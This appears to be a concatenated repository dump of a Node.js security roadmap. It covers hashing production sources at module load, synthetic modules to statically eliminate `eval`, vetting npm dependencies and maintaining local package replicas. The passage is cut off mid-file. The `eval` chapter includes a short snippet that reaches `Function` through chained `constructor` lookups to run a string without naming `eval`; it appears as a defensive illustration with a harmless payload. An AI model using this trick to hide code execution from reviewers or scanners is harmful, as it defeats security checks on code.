 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

exports.doSomethingScaryButItsOkInTest = function() {
    throw new Error('test-utils.js: NOT PRODUCTION CODE');
};


================================================
FILE: chapter-2/experiments/webpack-compat/test.sh
================================================
echo <<LICENSE
// Copyright 2017 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
LICENSE

echo <<POLYGLOT
/*

This file is both a syntactically valid JS file and a bash file
so that we can test webpack in its minimal configuration.
In its minimal configuration, webpack tries to bundle this file.

You may run this file via

$ bash test.sh

The rest of this is visible to a shell interpreter but not when
webpack mysteriously decides to load this as a JavaScript file.
POLYGLOT

set -e

pushd "$(dirname "$0")"

echo Bundling
rm -f dist/bundle.js
./node_modules/.bin/webpack

echo
echo Running bundle
if node dist/bundle.js 2>&1 | grep -q 'Hello, World!'; then
    echo 'Ran ok'
else
    echo 'Failed to bundle dependency'
fi

echo
echo Looking for non production code
if grep -Hn 'NOT PRODUCTION CODE' dist/bundle.js; then
    echo 'Webpack bundled test code in its minimal configuration'
    false
fi

# */


================================================
FILE: chapter-2/experiments/webpack-compat/webpack.config.js
================================================
const path = require('path');

module.exports = {
    output: {
        path: path.resolve('./dist'),
        filename: 'bundle.js',
    },
    entry: path.resolve('./index.js')
};


================================================
FILE: chapter-2/source-contents.md
================================================
# Source Content Checks

The Node runtime's module loader uses the `Module.prototype._compile`
method to turn file content into code:

```js
// Run the file contents in the correct scope or sandbox. Expose
// the correct helper variables (require, module, exports) to
// the file.
// Returns exception, if any.
Module.prototype._compile = function(content, filename) {
  content = internalModule.stripShebang(content);

  // create wrapper function
  var wrapper = Module.wrap(content);

  var compiledWrapper = vm.runInThisContext(wrapper, {
    // ... options elided ...
  });
  // ... remainder of the method elided ...
};
```

At the top of that method body, we can check that the content
is on a list of production sources.
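A minimal userland sketch of such a check follows. It assumes the list of production sources is a `Set` of hex-encoded SHA-256 hashes of file contents, and it supports a report-only mode that logs unapproved sources without refusing to load them. It wraps `Module.prototype._compile`, an undocumented Node internal whose parameters have changed across versions, so it forwards any extra arguments unchanged. `installSourceHashCheck`, `hashSource`, and their options are hypothetical names, not a Node API; a real implementation would live inside the runtime.

```js
'use strict';
// Userland sketch only: patches Node's undocumented Module.prototype._compile.
const crypto = require('crypto');
const Module = require('module');

// Hex-encoded SHA-256 of a module's source text.
function hashSource(content) {
  return crypto.createHash('sha256').update(content, 'utf8').digest('hex');
}

// allowedHashes: Set of hex SHA-256 hashes of approved production sources.
// reportOnly: when true, log unapproved sources but still load them.
// log: where failure messages go (hypothetical option).
// Returns a function that restores the original _compile.
function installSourceHashCheck(
    allowedHashes, { reportOnly = false, log = console.error } = {}) {
  const originalCompile = Module.prototype._compile;
  Module.prototype._compile = function (content, filename, ...rest) {
    const hash = hashSource(content);
    if (!allowedHashes.has(hash)) {
      const message = `Unapproved source ${filename} (sha256 ${hash})`;
      log(message);
      if (!reportOnly) {
        // Refuse to turn unapproved content into code.
        throw new Error(message);
      }
    }
    // Forward any extra parameters newer Node versions may pass.
    return originalCompile.call(this, content, filename, ...rest);
  };
  return function uninstall() {
    Module.prototype._compile = originalCompile;
  };
}
```

Starting in report-only mode and watching the logs before switching to enforcement mirrors the rollout the process below describes.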

The entire process looks like:

1.  The developer develops and tests their app iteratively, as usual.
2.  The developer generates a list of production sources via the
    dynamic bundling scheme outlined earlier, a static tool like
    webpack, or some combination.
3.  The bundling tool generates a file with a cryptographic hash
    for each production source.
    We prefer hashing to checking paths for reasons that will become
    apparent later when we discuss `eval`.
4.  A deploy script copies the bundle and the hashes to a production server.
5.  The server startup script passes a flag to `node` or `npm start`
    telling the runtime where to look for the production source hashes.
6.  The runtime reads the hashes and combines them with any hashes necessary
    to whitelist `node`'s internal JavaScript files that might load
    via `require`.
7.  When a call to `require(x)` reaches `Module.prototype._compile`,
    it hashes `content` and checks that the hash is in the allowed set.
    If it is not, the runtime logs the failure and, unless running in
    report-only mode, raises an exception.
8.  Normal log collection and monitoring communicate failures
    to the development team.
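Steps 3 and 6 might be sketched as follows, assuming the hash file is a JSON array of hex-encoded SHA-256 digests. `writeHashManifest`, `readHashManifest`, and the manifest format are hypothetical. A leading byte-order mark is stripped before hashing because Node's CommonJS loader strips one before compiling, so hashing the raw file would never match what the runtime sees.

```js
'use strict';
const crypto = require('crypto');
const fs = require('fs');

// Hex-encoded SHA-256 of source text.
function hashSource(content) {
  return crypto.createHash('sha256').update(content, 'utf8').digest('hex');
}

// Drop a leading U+FEFF so hashes match the content the loader compiles.
function stripBom(text) {
  return text.charCodeAt(0) === 0xFEFF ? text.slice(1) : text;
}

// Step 3 (sketch): write a sorted, de-duplicated JSON array of hashes
// for the given production source files.
function writeHashManifest(sourceFiles, manifestPath) {
  const hashes = [...new Set(sourceFiles.map(
      (file) => hashSource(stripBom(fs.readFileSync(file, 'utf8')))))].sort();
  fs.writeFileSync(manifestPath, JSON.stringify(hashes, null, 2) + '\n');
  return hashes;
}

// Step 6 (sketch): read the manifest back as a Set for fast lookups,
// rejecting anything that is not a list of 64-digit hex strings.
function readHashManifest(manifestPath) {
  const hashes = JSON.parse(fs.readFileSync(manifestPath, 'utf8'));
  if (!Array.isArray(hashes) ||
      !hashes.every((h) => typeof h === 'string' && /^[0-9a-f]{64}$/.test(h))) {
    throw new Error(`Malformed hash manifest: ${manifestPath}`);
  }
  return new Set(hashes);
}
```

Sorting the hashes keeps the manifest stable across builds, which makes it easy to diff when reviewing a deploy.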

This is similar to [Content-Security-Policy (CSP)][csp], but for
server-side code.  As with CSP, there is a useful intermediate step
between no enforcement and full enforcement:
[report only mode][].

[CSP]: https://developers.google.com/web/fundamentals/security/csp/
[report only mode]: https://developers.google.com/web/fundamentals/security/csp/#report-only


================================================
FILE: chapter-2/synthetic-modules.md
================================================
# Statically eliminating `eval`

Pug provides a flexible API to load Pug templates from `.pug` files
that `eval`s the generated code ([code][pug-eval]),
and a command line interface for precompiling Pug files.

Let's set those aside and imagine a way for a Pug user to compile a
Pug template so that its static nature is apparent even to an
analysis that makes no assumptions about the contents of `.pug`
files.

```js
const pug = require('pug');

exports.myTemplate = pug.lang`
doctype html
html
  head
    ...`;
```

This code snippet uses a [tagged template literal][] to allow Pug
template code to appear inline in a JavaScript file.

Rather than loading a `.pug` file, we have declared the template in JavaScript.

Imagine further that `pug.lang` runs the compiler, but instead of
using `new Function(...)` it uses a new, hypothetical module API

```js
require.synthesize(generatedCode)
```

which could manufacture a `Module` instance with the generated code and
install the module into the cache with the input hash as its filename.

When [bundling](bundling.md), we could dump the content of synthesized
modules and, when the bundle loads in production, pre-populate
the module cache with them.  When the `pug.lang` implementation asks the
module loader to create a module with the content between
<code>&#96;...&#96;</code>, it would find a resolved module ready but not
yet loaded.  If a module is already in the cache, `Module` skips the
additional content checks.
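A rough sketch of the bundle-time dump and the production-time read follows, assuming synthesized modules are written to a directory such as `synthetic_node_modules/`, one file per module, named by the hex-encoded SHA-512 of its content. `dumpSyntheticModules` and `loadSyntheticModules` are hypothetical helpers; actually installing the entries into `Module._cache` is left out because that requires runtime internals. Naming files by their hash lets production code verify each file before trusting it.

```js
'use strict';
const crypto = require('crypto');
const fs = require('fs');
const path = require('path');

// Hex-encoded SHA-512 of a synthesized module's content.
function syntheticHash(content) {
  return crypto.createHash('sha512').update(content, 'utf8').digest('hex');
}

// Bundle time: write each synthesized module to <dir>/<hash>.js and
// return the hashes in input order.
function dumpSyntheticModules(contents, dir) {
  fs.mkdirSync(dir, { recursive: true });
  return contents.map((content) => {
    const hash = syntheticHash(content);
    fs.writeFileSync(path.join(dir, `${hash}.js`), content, 'utf8');
    return hash;
  });
}

// Production: read the dumped modules into a hash -> content map,
// rejecting any file whose content no longer matches its name.
function loadSyntheticModules(dir) {
  const byHash = new Map();
  for (const name of fs.readdirSync(dir)) {
    if (!name.endsWith('.js')) continue;
    const content = fs.readFileSync(path.join(dir, name), 'utf8');
    const hash = syntheticHash(content);
    if (name !== `${hash}.js`) {
      throw new Error(`Synthetic module ${name} does not match its hash`);
    }
    byHash.set(hash, content);
  }
  return byHash;
}
```

A loader that pre-populates its cache from this map would then find every synthesized module by the same key at bundle time and in production.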

The Node runtime function `makeRequireFunction`
([code][makeRequireFunction]) defines a `require` for each module
that loads modules with the current module as the parent.  That function
would also have to define a module-specific `require.synthesize` that does
something like:

```js
  // Sketch of code inside makeRequireFunction(mod), where `mod` is the
  // module whose `require` is being built.  Assumes the enclosing file
  // has `const crypto = require('crypto');` at top level.
  function synthesize(content) {
    content = String(content);
    // Hashing gives us a stable identifier so that we can associate
    // code inlined during bundling with that loaded in production.
    // Hex-encode the digest so it can appear in a filename and an id.
    const hash = crypto
        .createHash('sha512')
        .update(content, 'utf8')
        .digest('hex');
    // A name that communicates the source while being
    // unambiguous with any actual file.
    const filename = '/dev/null/synthetic/' + hash;
    // We scope the identifier so that it is clear in
    // debugging traces that the module is synthetic and
    // to avoid leading existing tools to conclude that
    // it is available via registry.npmjs.org.
    const id = '@node-internal-synthetic/' + hash;
    const cache = Module._cache;
    let syntheticModule = cache[filename];
    if (syntheticModule) {
      // TODO: updateChildren(mod, syntheticModule, true);
    } else {
      syntheticModule = new Module(id, mod);
      syntheticModule.filename = filename;
      cache[filename] = syntheticModule;
      try {
        syntheticModule._compile(content, filename);
      } catch (e) {
        // Do not leave a half-initialized module in the cache.
        delete cache[filename];
        throw e;
      }
      // Mark the module loaded only once its body has run.
      syntheticModule.loaded = true;
    }
    // TODO: dump the module if the command line flags specify
    // a synthetic_node_modules/ output directory.
    return syntheticModule;
  }

  require.synthesize = synthesize;
```

Static analysis tools often benefit from having a whole program
available.  Humans can reason about external files, like `.pug` files,
but static analysis tools often have to be unsound, or assume the
worst.  Synthetic modules may provide a way to move a large chunk of
previously unanalyzable code into the domain of what static analysis
tools can check.

This scheme might be more discoverable if code generator authors
adopted some conventions:

*  If a module defines `exports.lang` it should be usable as a
   template tag.
*  If that same function is called with an option map instead
   of as a template tag function, then it should return a function
   to enable usages like
   ```js
   pug.lang(myPugOptionMap)`
     doctype html
     ...`
   ```
*  If the first line starts with some whitespace, all subsequent
   lines have that same whitespace as a prefix, and the language
   is whitespace-sensitive, then strip it before processing.
   This would allow indenting inline DSLs within a larger
   JavaScript program.
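The conventions above can be sketched as a small helper that a code generator might use to build its `lang` export. `makeLang`, `stripCommonIndent`, and the `compile` callback are hypothetical names for illustration, not Pug's API. The sketch also fills in details the list leaves open, as assumptions: it drops the blank line that usually follows the opening backtick, and it rejects `${...}` interpolations rather than guessing how to splice values into generated code.

```js
'use strict';
// Hypothetical helper a code generator could use to build its
// `exports.lang`.  `makeLang` and `compile` are illustrative names.

// Assumed convention: drop the blank line that follows the opening
// backtick, then strip the first line's leading whitespace from every
// line, but only if all non-blank lines share that prefix.
function stripCommonIndent(source) {
  const lines = source.split('\n');
  if (lines.length > 1 && lines[0].trim() === '') lines.shift();
  const first = lines.find((line) => line.trim() !== '');
  if (first === undefined) return lines.join('\n');
  const prefix = first.match(/^[ \t]*/)[0];
  const consistent = lines.every(
      (line) => line.trim() === '' || line.startsWith(prefix));
  if (!prefix || !consistent) return lines.join('\n');
  return lines.map((line) => line.slice(prefix.length)).join('\n');
}

// Returns `lang`, which works both as a template tag and, when called
// with an option map, as a factory for a configured template tag.
function makeLang(compile, defaultOptions = {}) {
  function tagWith(options) {
    return function tag(strings, ...values) {
      // This sketch rejects ${...} interpolation outright.
      if (values.length > 0) {
        throw new TypeError('interpolation is not supported');
      }
      // Use the raw text so backslashes reach the DSL unchanged.
      return compile(stripCommonIndent(strings.raw[0]), options);
    };
  }
  const defaultTag = tagWith(defaultOptions);
  return function lang(first, ...rest) {
    // A template tag's first argument is a strings array with `.raw`.
    if (Array.isArray(first) && Array.isArray(first.raw)) {
      return defaultTag(first, ...rest);
    }
    return tagWith(Object.assign({}, defaultOptions, first));
  };
}

// Usage with a stand-in "compiler" that just echoes its input.
const lang = makeLang((source, options) => ({ source, options }));
const page = lang({ pretty: true })`
    doctype html
    html
      head`;
// page.source is 'doctype html\nhtml\n  head'
```

Checking for the `raw` property is what lets one exported function serve both call shapes, since an option map is an ordinary object and never an array with `raw`.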

We discuss template tag usability concerns in more detail later when
discussing [library tweaks][library].

This proposal has one major drawback: we still have to trust the code
generator.  Pug's code generator looks well structured, but reasoning
about all the code produced by a code generator is harder than
reasoning about one hand-written module.  The [frozen realms][] proposal
would restrict code to a provided API, as `vm.runInNewContext` aimed to.
If Pug, for example, chose to load its generated
code in a sandbox, then checking just the provided context would give
us confidence about what generated code could do.  In some cases, we
might be able to move the code generator outside the
[*trusted computing base*][TCB].

[tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
[pug-eval]: https://github.com/pugjs/pug/blob/926f7c720112cac76cfedb003e25e9f43d3a1767/packages/pug/lib/index.js#L261-L263
[library]: ../chapter-7/libraries.md
[makeRequireFunction]: https://github.com/nodejs/node/blob/8f5040771475ca5435b6cb78ab2ebce7447afcc1/lib/internal/module.js#L5
[frozen realms]: https://github.com/tc39/proposal-frozen-realms
[TCB]: https://en.wikipedia.org/wiki/Trusted_computing_base


================================================
FILE: chapter-2/what-about-eval.md
================================================
# What about `eval`?

Previously we've talked about how to control what code loads
from the file system, but not what code loads from strings.

The rest of this discussion uses the term "`eval`" to refer to any of
the `eval` operator, the `eval` function, `new Function`,
`vm.runIn*Context`, `vm.Script.run*`, [`WebAssembly.compile`][]
and other operators that convert strings or bytes into code.

Recall that it is difficult to prove that code
[does not `eval`](../chapter-1/threat-RCE.md):

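```js
var x = {},
    a = 'constructor',
    b = 'constructor',
    s = 'console.log(typeof process)';
// x[a] is Object and x[a][b] is Function, so this is Function(s)():
// it compiles and runs the string s without naming eval or Function.
x[a][b](s)();
```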

Some node projects deploy with a tweaked node runtime that turns off
some `eval` operators, but there are widely used npm modules that use
them carefully.  For example:

*  [Pug][]  generates HTML from templates.
*  [Mathjs][] evaluates closed-form mathematical expressions.

Both generate JavaScript code under the hood, which is dynamically
parsed.  Let's consider two use cases:

*  Pug's code generator is usually called with trusted inputs, e.g.
   `.pug` files authored by trusted developers.
*  Mathjs is often called with untrusted inputs.  If a developer
   wanted to let a user generate an ad-hoc report without having to
   download data into a spreadsheet, they might use Mathjs to parse
   user-supplied arithmetic expressions ([docs][more_secure_eval])
   instead of trying to check that an input is safe to `eval` via
   `RegExp`s.  It is not without risk ([advisory][adv552])
   though [^1].
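To make the Mathjs approach concrete: rather than vetting a string and then handing it to `eval`, one can parse the input against a small grammar and evaluate the parse. The sketch below is not Mathjs's implementation or API; `evaluateArithmetic` is a hypothetical helper that accepts only numbers, `+ - * /`, unary minus, and parentheses.

```js
'use strict';
// Hypothetical helper, not Mathjs's API.  Grammar:
//   expr   := term (('+' | '-') term)*
//   term   := factor (('*' | '/') factor)*
//   factor := number | '(' expr ')' | '-' factor
function evaluateArithmetic(input) {
  // Numbers, operators and parentheses; any other non-space character
  // becomes its own token so that the parser rejects it.
  const tokens = String(input).match(/\d+(?:\.\d+)?|[-+*\/()]|\S/g) || [];
  let pos = 0;
  const peek = () => tokens[pos];
  const next = () => tokens[pos++];

  function factor() {
    const tok = next();
    if (tok === '-') return -factor();
    if (tok === '(') {
      const value = expr();
      if (next() !== ')') throw new SyntaxError('expected )');
      return value;
    }
    if (tok !== undefined && /^\d/.test(tok)) return Number(tok);
    throw new SyntaxError(`unexpected token: ${tok}`);
  }

  function term() {
    let value = factor();
    while (peek() === '*' || peek() === '/') {
      value = next() === '*' ? value * factor() : value / factor();
    }
    return value;
  }

  function expr() {
    let value = term();
    while (peek() === '+' || peek() === '-') {
      value = next() === '+' ? value + term() : value - term();
    }
    return value;
  }

  const result = expr();
  if (pos !== tokens.length) throw new SyntaxError('trailing input');
  return result;
}
```

Input outside the grammar, such as `process.exit(1)`, fails with a `SyntaxError` instead of running. Deeply nested parentheses could still exhaust the call stack, so a production parser would also cap input length or nesting depth.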

These two uses of code generators fall at either end of a spectrum.
The uses of Pug seem static; all the information is available before
we deploy.  Our Mathjs use case is necessarily dynamic since the
input is not available until a user is in the loop.

Next we discuss ways to recognize and simplify the former, while
double-checking the latter.  On the client, we have no options between
allowing implicit `eval` and banning all uses of `eval`.  There are
fewer compelling use cases on the client since it is harder to
amortize code generation over multiple requests.  On the server, use
of `eval` in the presence of untrusted inputs still needs to be
carefully vetted.  We explore ways to programmatically enforce vetting
decisions short of a blanket ban, but turning off `eval` before
accepting untrusted inputs is still the most reliable way to prevent
attackers from using `eval` against you.
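Short of a tweaked runtime, recent versions of Node accept a `--disallow-code-generation-from-strings` command-line flag that makes `eval` and `new Function` throw instead of compiling. The sketch below shows how a program could confirm at startup that the flag took effect; the file name `check-eval.js` is arbitrary. It checks one mechanism, not every operator listed above, so consult the Node CLI documentation for the version you deploy.

```js
'use strict';
// Reports whether this process may turn strings into code.
// Try it both ways:
//   node check-eval.js
//   node --disallow-code-generation-from-strings check-eval.js
function codeGenerationAllowed() {
  try {
    (0, eval)('1 + 1');  // indirect eval of a harmless expression
    return true;
  } catch (e) {
    // With the flag set, V8 throws an EvalError instead of compiling.
    if (e instanceof EvalError) return false;
    throw e;
  }
}

console.log(codeGenerationAllowed() ? 'eval allowed' : 'eval disallowed');
```

A server that must accept untrusted input could refuse to start when `codeGenerationAllowed()` returns `true`, turning the deployment decision into something checked rather than assumed.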

[^1]: Since this writing, [Mathjs got rid of all uses of `eval`][no-eval-issue]


[`WebAssembly.compile`]: http://webassembly.org/docs/js/#webassemblycompile
[Pug]: https://pugjs.org/
[Mathjs]: http://mathjs.org/
[more_secure_eval]: http://mathjs.org/examples/advanced/more_secure_eval.js.html
[adv552]: https://nodesecurity.io/advisories/552
[no-eval-issue]: https://github.com/josdejong/mathjs/issues/1019#issuecomment-367289278


================================================
FILE: chapter-3/knowing_dependencies.md
================================================
# Knowing your dependencies

## Background

[`npmjs` search results][npmjs/node] have stats on download count and
open issues and PRs.

<img alt="npmjs.com stats for module node" src="../images/npmjs-node.png" height="399" width="230">

Each package page also links to the corresponding GitHub project,
which links to the project's [pulse][github-pulse].

Both of these give an idea of how popular the project is, and
whether it's actively developed.

On their GitHub pages, many projects proudly display
[badges and shields][] indicating their continuous integration status
and other vital statistics.

The Linux Foundation's Core Infrastructure Initiative espouses a set of
[best practices badges][bpb] and defines tiers for mature infrastructure
projects.  We get some of the basic items for free by distributing via
`npm`, but other items bear on how responsive the project might be to
vulnerability reports and how it might respond to attempts to inject
malicious code:

*  Someone else will have the necessary access rights if someone dies
*  Monitor external dependencies to detect/fix known vulnerabilities
*  At least 2 unassociated significant contributors
*  Use 2FA
*  At least 50% of all modifications are reviewed by another developer
*  Have a security review (internal or external)

"Use 2FA" is possible with npm, but it is not clear that it is widely
practiced.  [MTP][] discusses the support already built into GitHub
and `npm profile`.


## Problem

Threats: [LQC][] [MTP][]

The npm repository, like other open-source code repositories,
contains mature and well-maintained modules, but also plenty of
bleeding-edge code that has not yet had bugs ironed out.

A wise technical lead might decide that they can use third-party
dependencies that have been widely used in production for several
years by projects with similar needs, since gross errors are likely
to have been fixed.

That technical lead might also decide that they can use bleeding edge
code when they have enough local expertise to vet it, identify
corner-cases they need to check, and fix any gross errors they
encounter.

Either way, that decision to use bleeding-edge code or code that might
not be maintained over the long term should be a conscious one.


## Success Criteria

Development teams are rarely surprised when code that they had built a
prototype on later turns out not to be ready for production use, and
they do not have to pore over others' code to vet many dependencies.

## A Possible Solution

The building blocks of a solution probably already exist.

### Aggregate more signals

`npmjs.com` may or may not be the right place to do this, but we
should, as a community, aggregate signals about modules and make
them readily available.

`npmjs.com/package` already aggregates some useful signals, but
it or another forum could aggregate more, including:

-  More of the GitHub pulse information, such as
   closed issues and PRs over time.
-  Relevant badges & shields for the project itself.
-  Relevant badges & shields by percentage of transitive
   dependencies and peer dependencies that have them.
-  Support channels, e.g. Slack & Discord.
-  Vulnerability reports and the version they affect.
   See sources in ["When all else fails"][failing]
-  Weighted mean of age of production dependencies transitively.
-  Results of linters (see [oversight][]) run without respecting
   [inline ignore comments][eslint-ignore-line] and
   [file ignore directives][eslint-ignore-file].
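As an illustration of one signal from that list, here is a sketch of the weighted mean age of transitive production dependencies. The input shape and the weighting are assumptions: `graph` is a hypothetical map from package name to `{ published, dependencies }` (for example, assembled from registry metadata), and each dependency is weighted by how many packages in the graph depend on it directly.

```js
'use strict';
// Hypothetical input shape (an assumption for illustration):
//   graph[name] = { published: Date, dependencies: [name, ...] }
// listing production dependencies only.
// Each transitive dependency of `root` is weighted by its direct
// in-degree: how many reachable packages list it as a dependency.
const MS_PER_DAY = 24 * 60 * 60 * 1000;

function weightedMeanDependencyAgeDays(graph, root, now = new Date()) {
  const weights = new Map();  // dependency name -> in-degree
  const seen = new Set([root]);
  const queue = [root];
  while (queue.length > 0) {
    const name = queue.shift();
    for (const dep of graph[name].dependencies) {
      if (dep === root) continue;  // ignore cycles back to the root
      weights.set(dep, (weights.get(dep) || 0) + 1);
      if (!seen.has(dep)) {
        seen.add(dep);
        queue.push(dep);
      }
    }
  }
  let weightedDays = 0;
  let totalWeight = 0;
  for (const [name, weight] of weights) {
    const ageDays = (now - graph[name].published) / MS_PER_DAY;
    weightedDays += weight * ageDays;
    totalWeight += weight;
  }
  return totalWeight === 0 ? 0 : weightedDays / totalWeight;
}
```

Weighting by in-degree makes widely shared dependencies count more; weighting by code size or by depth in the tree would be equally defensible choices.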

Users deciding whether to buy something from an online store or
download a cellphone app from an app store have reviews
and comments from other users.  That members of the community take
time to weigh in can be a useful signal, and the details can help
clarify whether this module or an alternative might be better for a
specific use.

Large organizations that host [internal replicas][] may already have
much of this opinion available internally, but aggregating it across
clients can help smaller organizations, as well as large organizations
that are debating whether to dip their toes in.


### Leadership & Developer outreach

The node runtime already [passes][CI-node] the Linux Foundation's best
practices criteria, but could lead the way by explaining how a project
that pushes from GitHub to `registry.npmjs.org` can pass more of these
criteria.


[npmjs/node]: https://www.npmjs.com/package/node
[github-pulse]: https://github.com/blog/1476-get-up-to-speed-with-pulse
[badges and shields]: https://github.com/badges/shields
[bpb]: https://github.com/coreinfrastructure/best-practices-badge
[internal replicas]: ../chapter-4/close_dependencies.md
[failing]: ../chapter-6/failing.md
[CRY]: ../chapter-1/threat-CRY.md
[LQC]: ../chapter-1/threat-LQC.md
[MTP]: ../chapter-1/threat-MTP.md
[oversight]: ../chapter-5/oversight.md
[eslint-ignore-line]: https://eslint.org/docs/user-guide/configuring#disabling-rules-with-inline-comments
[eslint-ignore-file]: https://eslint.org/docs/user-guide/configuring#ignoring-files-and-directories
[CI-node]: https://bestpractices.coreinfrastructure.org/projects?gteq=50&q=Node.js


================================================
FILE: chapter-4/close_dependencies.md
================================================
# Keeping your dependencies close

## Background

When deploying an application or service, many projects run
`npm install`, which can cause problems.  [James Shore][] discusses the
problem and several solutions, none of which are ideal.

*  Network trouble reaching `registry.npmjs.org` becomes a single
   point of failure.
*  An extra `npm shrinkwrap` step is necessary to ensure that
   the versions used during testing are the same as the versions
   deployed (Shore's analysis predates [package locks][]).
*  Alternatively, developers check `node_modules` into revision control,
   which may include architecture-specific binaries.
*  Local changes may be silently lost when re-installed on a dev
   machine or on upgrade.

Many organizations use tools to manage a local replica.

*  [npm Enterprise][] is a full-featured single-tenant implementation
   of the npm registry and website, created by npm, Inc.
*  npm can be [configured to use a different registry][] by setting
   the `registry` npm configuration option.  Once dependencies have
   been cached locally the first time, the `--offline` npm option will
   prevent fetching anything new from the network.
*  [Artifactory][] is a language agnostic dependency manager that
   supports Node.
*  [Sinopia][] is a Node specific repository server.
*  [Verdaccio][] is a fork of Sinopia.
*  [Yarn][] is a package manager backed by the same
   <https://registry.npmjs.org> but which can be pointed at an
   [offline mirror][].  The offline mirror can have multiple tarballs
   per module to deal with architecture specific builds.  Its
   `--offline` mode prevents falling back to the central registry, though
   it does not prevent network fetches by module scripts.

Node's security working group has a [process][security-wg process] for
managing vulnerabilities in third-party code.

## Problem

Threats: [0DY][] [MTP][]

Security teams need to match vulnerability reports with projects that
use affected modules so that they can respond to [zero days][0DY].
Centralizing module installation allows them to figure out whether a
report affects any module that their projects use.

Large organizations with dedicated security specialists need to be
able to locally patch security issues or critical bugs and push to
production without waiting for upstream to push a new version.  When
someone in the organization discovers a vulnerability in a third-party
module, they should disclose it to the third-party maintainer, but
they should not wait before protecting end users who would be at risk
if an attacker independently discovered the same vulnerability.

## Success Criteria

We can have a reliable pipeline from the central repository,
through local repositories and to deployed services if:

*  A failure in `registry.npmjs.org` does not lead to compromise or
   denial of service by `npm install` during deployment, and/or
*  `npm install` is not necessary for deployment.

and

*  access to `registry.npmjs.org` is not necessary to publish
   a patch to an open source module as seen within an
   organization.

and

*  installing or deploying a module locally cannot abuse publish
   privileges, and/or
*  an organization can limit its exposure to compromise of
   `registry.npmjs.org`, and ideally vice-versa.

and

*  installation scripts only affect `node_modules` so cannot
   compromise local repositories, abuse commit privileges,
   or plant [trojans][trojan].


## Existing solutions

Having a local replica simplifies deploying targeted patches to
affected projects.  When responding, security specialists might
develop a patch before upstream.  They may be able to take into
account how their products use the module to produce a targeted patch
faster than upstream maintainers who have greater or
less-well-understood backwards compatibility constraints.

Keeping a local replica narrows the window for [MTP][] attacks.
Someone trying to inject malicious code has to have it up and
available from `registry.npmjs.org` at the time the install script
pulls it down, which is hard for an attacker to predict.  There is a
monoculture tradeoff &mdash; having a smaller number of versions
across all projects increases the potential reach of such an attack
once successfully executed.  Centralized monitoring and reporting
tilts in the defenders' favor though.


## Incident Response

There is one piece that isn't provided directly by the local replica
providers above: security responders need a way to relate
vulnerability reports to affected projects when a [zero day][0DY]
clock starts ticking so they can figure out whom to notify.

*  If an organization shares revision control across all projects, then
   responders can find all `package.json`s and use git commit logs to
   identify likely points of contact.  Much of this is scriptable.
*  If an organization archives all production bundles before deployment,
   then tools can similarly scan archived bundles for `package.json`.
*  If an organization has an up-to-date database of projects with
   up-to-date links to revision control systems, then security teams
   may be able to automate scanning as above.
   Some managers like to have "skunkworks" projects that they keep
   out of project databases.
   Managers should be free to use codenames, but security teams need
   to ensure that "unlisted" doesn't mean "not supportable by
   incident response."
*  If none of the above work, security teams will need to maintain a
   database so that they have it when they need it.
   If the local replica is on a shared file system mount, then access
   logs may be sufficient.  If not, instrumenting `yarn` may be the
   only option.
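For the first option, the scriptable part might look like the sketch below: walk a checkout, read every `package.json`, and report which ones declare the module named in an advisory. `findDependents` is a hypothetical helper; it only reads declared version ranges, so confirming the version actually installed, and finding points of contact via `git log`, are left as follow-up steps.

```js
'use strict';
const fs = require('fs');
const path = require('path');

// package.json sections that can name a dependency.
const SECTIONS = ['dependencies', 'devDependencies',
                  'optionalDependencies', 'peerDependencies'];

// Hypothetical helper: walks `rootDir`, skipping node_modules and
// dot-directories such as .git, and returns every package.json that
// declares `moduleName` along with the version range it requests.
// Symlinked directories are not followed, which avoids cycles.
function findDependents(rootDir, moduleName) {
  const hits = [];
  const stack = [rootDir];
  while (stack.length > 0) {
    const dir = stack.pop();
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      const full = path.join(dir, entry.name);
      if (entry.isDirectory()) {
        if (entry.name !== 'node_modules' && !entry.name.startsWith('.')) {
          stack.push(full);
        }
      } else if (entry.isFile() && entry.name === 'package.json') {
        let pkg;
        try {
          pkg = JSON.parse(fs.readFileSync(full, 'utf8'));
        } catch (e) {
          continue;  // skip unreadable manifests rather than abort the scan
        }
        if (!pkg || typeof pkg !== 'object') continue;
        for (const section of SECTIONS) {
          const range = pkg[section] && pkg[section][moduleName];
          if (typeof range === 'string') {
            hits.push({ file: full, section, range });
          }
        }
      }
    }
  }
  return hits;
}
```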

## Managing a Local Replica

If you don't have access to a commercial solution, some tooling can
make it easier to transition to and maintain a local replica.
We assume `yarn` below, but there are free versions of others which
may do some of this out of the box.

*  Developers' muscle memory may cause them to invoke `npm` instead of
   `yarn`, so on a developer machine `$(which npm)` run in an
   [interactive shell][] should halt and remind the developer to use
   `yarn` instead.  Presubmit checks should scan scripts for
   invocations of `npm` to remind developers to use `yarn`.  It may be
   possible to use a project specific `.npmrc` with flags that cause
   it to dry-run or dump usage and exit, but this would affect
   non-interactive scripts so tread carefully.
*  A script can aid installing new modules into the local replica.
   It should:

   1. Run `yarn install --ignore-scripts` to fetch the module content
      into a revision controlled repository
   2. Build the module tarballs.  (See below)
   3. Check the revision controlled portion and any organization-specific
      metadata into revision control
   4. File a tracking issue for review of the new module, so that
      code quality checks can happen in parallel with the developers
      test-driving the module and figuring out whether it really
      solves their problem.
   5. Optionally, run `yarn add` to add the module to the developer's `package.json`.
*  Developers shouldn't have direct write access to the local replica
   so that malicious code running on a single developer's workstation
   cannot compromise other developers via the local replica.
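The presubmit check from the first item might start as small as the sketch below, which scans the `scripts` section of a parsed `package.json` for direct `npm` invocations. `findNpmInvocations` and its regular expression are hypothetical and heuristic; the same pattern could be applied line by line to shell scripts.

```js
'use strict';
// Hypothetical presubmit check: flag package.json scripts that invoke
// `npm` directly so developers can switch them to `yarn`.
// Heuristic: match `npm` as a whole command word (at the start, or
// after whitespace, `;`, `&`, `|`, or `(`), which ignores `pnpm`,
// `npx`, and package names like `npm-run-all`.
const NPM_COMMAND = /(^|[\s;&|(])npm(?=\s|$)/;

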